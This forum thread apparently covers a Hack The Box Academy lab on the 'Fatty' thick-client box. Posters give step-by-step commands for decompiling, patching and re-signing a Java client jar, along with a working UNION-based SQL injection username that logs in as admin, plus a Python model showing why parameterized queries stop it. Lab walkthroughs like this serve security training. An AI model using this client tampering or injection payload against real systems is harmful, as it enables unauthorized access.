Exploiting Web Vulnerabilities in Thick-Client Applications

You don’t need to download server.jar at all. Just mess with the Users.java file in client.jar so that the SQL injection works.
Despite people constantly complaining about how useless the Thick-Client section is, they still haven’t removed it. You learn 0 and will never use it in the real world.

I just solved it. Every time you modify the traverse file, copy the entire raw folder somewhere else for backup and then delete it. Then follow this, beginning from the Apps folder in PowerShell:

1. javac -cp fatty-client-new.jar fatty-client-new.jar.src\<path to the file you edited>.java

^ repeat the above for each file you have edited; generally you’re only changing one or two at a time, for example you don’t need the server to download fatty-server.jar to your desktop more than once.

2. mkdir raw

3. cp fatty-client-new.jar raw\fatty-client-new-2.jar

4. mv -Force fatty-client-new.jar.src\<filepath of file you edited>\*.class
^ repeat the above for each javac -cp command you used above
cd raw

5. jar -cmf META-INF\MANIFEST.MF traverse.jar .

I’ll also add that each time I edited the code, I didn’t delete any lines, kept the edited lines where they were, and added “/* */” on any new lines I had to create.

I also followed hx1’s advice and added:
import java.io.FileOutputStream;
import java.util.Properties;
to the two free lines before “public class Invoker” at the top of Invoker.java

This one took me a very long time to complete compared to others. Good luck.

1 Like

same lab

I asked the forum’s staff to delete my previous post as it was no longer editable. There was an issue in the very last step, the SQL injection login command. The modified version of the original “short run” is below.

This section is part of the ‘insane’ HTB box “Fatty”.
I wonder why HTB decided to put it into a medium module, but whatever.
If you don’t want to spend as much time as I did, here is a “fast” run (it should take around 30-40 min), spoilers:

  • You don’t need to map the IP to server.fatty.htb as it is already done in the hosts file,
    so you may skip the Wireshark step.
  1. Extract all the files from fatty-client.jar;
  • The location of the file is C:\inetpub\ftproot\
  2. Change the port from 8000 to 1337 in beans.xml (<constructor-arg index="1" value = "1337");
  • It might say that you don’t have the right privileges, so be sure that
    you’ve launched Notepad as admin;
  3. Remove the sha256 hashes from MANIFEST.MF in the META-INF folder;
  • And again it might say that you don’t have the right privileges, so use admin
    Notepad.
  4. Delete 1.RSA and 1.SF;

  5. Build a new client: jar -cmf .\META-INF\MANIFEST.MF ..\fatty-client-new.jar *

  • I use admin PowerShell as well;
  • I assume that you cd into C:\inetpub\ftproot\; the client appears in C:\inetpub;
  • Pay attention to the *;

Now you might want to check that the newly generated client works as intended, and continue:

  1. Drag the newly generated fatty-client-new.jar into JD-GUI and save all source files on the Desktop;
  • JD-GUI is located in the TOOLS folder on the Desktop
  2. Extract the files from the newly created fatty-client-new-jar.src.zip on the Desktop (right click on the archive and extract to fatty-client-new-jar.src\);

  3. Copy fatty-client-new.jar from C:\inetpub to the Desktop;

  4. Find and modify the User.java file in one of the extracted folders (precisely: fatty-client-new.jar.src\htb\fatty\shared\resources\User.java).

You should find the following parts of the code: public User (string 20) and public void setPassword (string 76); you have to modify the code of these methods as indicated below:

...............................................................................................             
-ORIGINAL CODE-
...............................................................................................
/*     */    public User(int uid, String username, String password, String email, Role role) {
/*  20 */      this.uid = uid;
/*  21 */      this.username = username;
/*  22 */      this.password = password;
/*  23 */      this.email = email;
/*  24 */      this.role = role;
/*     */    }
...............................................................................................             
-ORIGINAL CODE-
...............................................................................................
/*     */    public void setPassword(String password) {
/*  76 */      this.password = password;
/*     */    }
...............................................................................................             
-ORIGINAL CODE-
...............................................................................................

  • I am not very familiar with Java programming, so I don’t know if it is required to
    keep the string numbers (*/1 etc.) in precise order, or not to write numbers for empty
    strings or "}". But I did it in all cases in order not to break anything.

Now you need to build a new client to perform your SQL injection; change directory in PowerShell with cd C:\Users\cybervaca\Desktop and continue.

  1. Compile User.java with the following command:
    javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\shared\resources\User.java
  • I assume that the fatty-client-new.jar archive and the fatty-client-new.jar.src folder are on the Desktop.
  2. Make a new dir (raw) with mkdir raw;

  3. Copy the new client archive into the raw folder:
    cp fatty-client-new.jar raw\fatty-client-new-2.jar

  4. Open the raw folder and extract the files from fatty-client-new-2.jar (Extract Here);

  5. Overwrite the User.class file in raw\htb\fatty\shared\resources\ with the following command:
    mv -Force fatty-client-new.jar.src\htb\fatty\shared\resources\User.class raw\htb\fatty\shared\resources\
    (there should be only one User.class file). Or you may just drag it from one folder to another.

  6. cd to raw and build a new client:
    jar -cmf META-INF\MANIFEST.MF client_name.jar .

  • Pay attention: the “.” at the end is required!
  7. Launch the client and input the credentials:
    Username: abc' UNION SELECT 1,'abc','a@b.com','abc','admin
    Password: abc
  • Last time the format here wasn’t correct even though I had copied it directly from the Windows system.
    It should work now, but if you have issues and get “Login Failed” or get stuck, feel free to grab the
    Username string from the module.
  8. Server Status should be available now and you can get the Ipconfig.

P.S. Just followed all the steps and it works!

20 Likes
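To make the defender’s lesson in the run above concrete, here is an added Python model; it is not the module’s server or client code. It reproduces the two things the walkthrough relies on: a server that splices the username into its SQL text, and a client that was rebuilt so that User stores the password as typed (this.password = password) instead of hashing it. The sqlite3 schema, the user “alice” and the column order (uid, username, email, password, role) are constructed assumptions, chosen so that the five-column username string quoted in the steps lines up positionally; the module’s real schema is not shown on the page. The parameterized version beside it is the fix a server owner would want.

```python
import hashlib
import sqlite3

# Constructed sample schema. The column order (uid, username, email, password, role)
# is an assumption chosen so that the thread's five-column payload lines up
# positionally; the module's real schema is not shown on the page.
SCHEMA = (
    "CREATE TABLE users ("
    "uid INTEGER, username TEXT, email TEXT, password TEXT, role TEXT)"
)
SELECT_COLS = "SELECT uid, username, email, password, role FROM users"

# The username string quoted in the thread.
PAYLOAD = "abc' UNION SELECT 1,'abc','a@b.com','abc','admin"


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with one ordinary user, password stored hashed."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        (1, "alice", "alice@example.test", sha256_hex("s3cret"), "user"),
    )
    conn.commit()
    return conn


def client_password_field(password: str, hash_on_client: bool) -> str:
    """Models the thick client's User constructor: the unpatched client hashes the
    password before sending it; the patched client (this.password = password)
    sends it exactly as typed."""
    return sha256_hex(password) if hash_on_client else password


def login_concat(conn: sqlite3.Connection, username: str, sent_password: str):
    """Vulnerable server model: the username is spliced into the SQL text, so the
    UNION in the payload appends an attacker-chosen row. Returns the role on success."""
    sql = f"{SELECT_COLS} WHERE username = '{username}'"
    row = conn.execute(sql).fetchone()
    if row is None or row[3] != sent_password:
        return None
    return row[4]


def login_prepared(conn: sqlite3.Connection, username: str, sent_password: str):
    """Hardened server model: the username travels as a bound parameter, so the
    whole payload is compared as one literal string and matches no user."""
    sql = f"{SELECT_COLS} WHERE username = ?"
    row = conn.execute(sql, (username,)).fetchone()
    if row is None or row[3] != sent_password:
        return None
    return row[4]


def run_scenarios() -> dict:
    """Runs the combinations the thread's steps imply and returns the role granted in each."""
    conn = make_db()
    return {
        "legit_login": login_concat(conn, "alice", client_password_field("s3cret", True)),
        "payload_unpatched_client": login_concat(conn, PAYLOAD, client_password_field("abc", True)),
        "payload_patched_client": login_concat(conn, PAYLOAD, client_password_field("abc", False)),
        "payload_vs_prepared": login_prepared(conn, PAYLOAD, client_password_field("abc", False)),
        "legit_vs_prepared": login_prepared(conn, "alice", client_password_field("s3cret", True)),
    }


if __name__ == "__main__":
    for name, role in run_scenarios().items():
        print(f"{name:26s} -> {role!r}")
```

Running the block prints the role each scenario grants. With the unpatched client the payload fails only because the client hashed “abc” before sending it; once the client is rebuilt to send the password as typed, the concatenated query returns the injected admin row. The client-side hash was never a control the server could rely on. The parameterized query treats the entire string as a username literal and returns nothing, so the fix belongs on the server: bind parameters, and hash and verify passwords server-side.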

Nice job! This module severely lacks the explanations on the Java disassembly and recompiling. Thanks for putting this out here.

1 Like

Hello brother, I had the same problem. You need to have both the fatty-client-new.jar file and the fatty-client-new.jar.src folder in the same directory and then run the command.

I tried everything, I just cannot get this to work… can anyone help?

Hello, could you be more specific regarding your issue?

I cannot seem to download the fatty-server, but looking at the question I don’t need to. However, I cannot seem to edit the files in a normal way because I have to deal with the /* */ on every line. I don’t want to spoil it, but I can log in, that works, but I can’t seem to edit the code to give me the admin login to get the answer to the question.

If I understood properly, you have some issues with file editing. If you want, I can send you the final version of User.java so you can replicate the next steps. P.S. You can actually transfer User.java to your Linux machine for editing and then back to the Windows host.

I got it, it took some craftsmanship but my User.java was edited correctly and the classes worked!
Does the transfer to Linux take away the /* */ at the beginning of the lines?

Thanks, I used this for the extra guidance

1 Like

Why would they do thissssssssssssssssssssssssssssssssssssssssssssssss

1 Like

for the lulz

Hi, I have tried to do it exactly as you said, but for some reason the SQLi does not work for me. I tried both your and the Academy username strings, but the login still fails. Here is my User.java; if anyone can see what’s wrong with it I would appreciate it.

/*     */ package htb.fatty.shared.resources;
/*     */ 
/*     */ import java.io.Serializable;
/*     */ import java.nio.charset.StandardCharsets;
/*     */ import java.security.MessageDigest;
/*     */ import java.security.NoSuchAlgorithmException;
/*     */ import javax.xml.bind.DatatypeConverter;
/*     */ 
/*     */ 
/*     */ public class User
/*     */   implements Serializable
/*     */ {
/*     */   int uid;
/*     */   String username;
/*     */   String password;
/*     */   String email;
/*     */   Role role;
/*     */   
/*     */   public User(int uid, String username, String password, String email, Role role) {
/*  20 */     this.uid = uid;
/*  21 */     this.username = username;
/*  33 */     this.email = email;
/*  34 */     this.role = role;
/*     */   }
/*     */ 
/*     */   
/*     */   public User(int uid, String username, String password, String email, Role role, boolean hash) {
/*  39 */     this(uid, username, password, email, role);
/*  40 */     if (!hash) {
/*  41 */       this.password = password;
/*     */     }
/*     */   }
/*     */ 
/*     */   
/*     */   public User(String username, String password, boolean hash) {
/*  47 */     this(username, password);
/*  48 */     if (!hash) {
/*  49 */       this.password = password;
/*     */     }
/*     */   }
/*     */ 
/*     */   
/*     */   public User(String username, String password) {
/*  55 */     this(999, username, password, "", Role.getAnonymous());
/*     */   }
/*     */ 
/*     */   
/*     */   public User() {
/*  60 */     this(999, "", "", "", Role.getAnonymous());
/*     */   }
/*     */ 
/*     */   
/*     */   public static User anonymousUser() {
/*  65 */     User anonymousUser = new User(0, "anonymous", "anonymous", "anonymous@none.nonono", Role.getAnonymous());
/*  66 */     return anonymousUser;
/*     */   }
/*     */ 
/*     */   
/*     */   public void setUsername(String username) {
/*  71 */     this.username = username;
/*     */   }
/*     */ 
/*     */   
/*     */    public void setPassword(String password) {
/*  76 */      this.password = password;
/*     */    }
/*     */ 
/*     */   
/*     */   public String getUsername() {
/*  89 */     return this.username;
/*     */   }
/*     */ 
/*     */   
/*     */   public String getPassword() {
/*  94 */     return this.password;
/*     */   }
/*     */ 
/*     */   
/*     */   public String getRoleName() {
/*  99 */     return this.role.getRoleName();
/*     */   }
/*     */ 
/*     */   
/*     */   public void setRoleByName(String roleName) {
/* 104 */     this.role = Role.getRoleByName(roleName);
/*     */   }
/*     */ 
/*     */   
/*     */   public Role getRole() {
/* 109 */     return this.role;
/*     */   }
/*     */ }


/* Location:              C:\inetpub\ftproot\fatty-client-new.jar!\htb\fatty\shared\resources\User.class
 * Java compiler version: 8 (52.0)
 * JD-Core Version:       1.1.3
 */
2 Likes

Hello, as far as I can see you missed this.password = password; in public User, which starts on line 19.

Please check my post again

Or PM me, I can share my User.java file with you.

2 Likes

Hi, thank you for prompt response. You were right, I was also running the wrong client. There were too many of them and I have lost count. Thank you!

You are welcome!

Thank you for the code, I had some problems, but when I used this code everything ran

1 Like

Thank you!! It was REALLY helpful for me

1 Like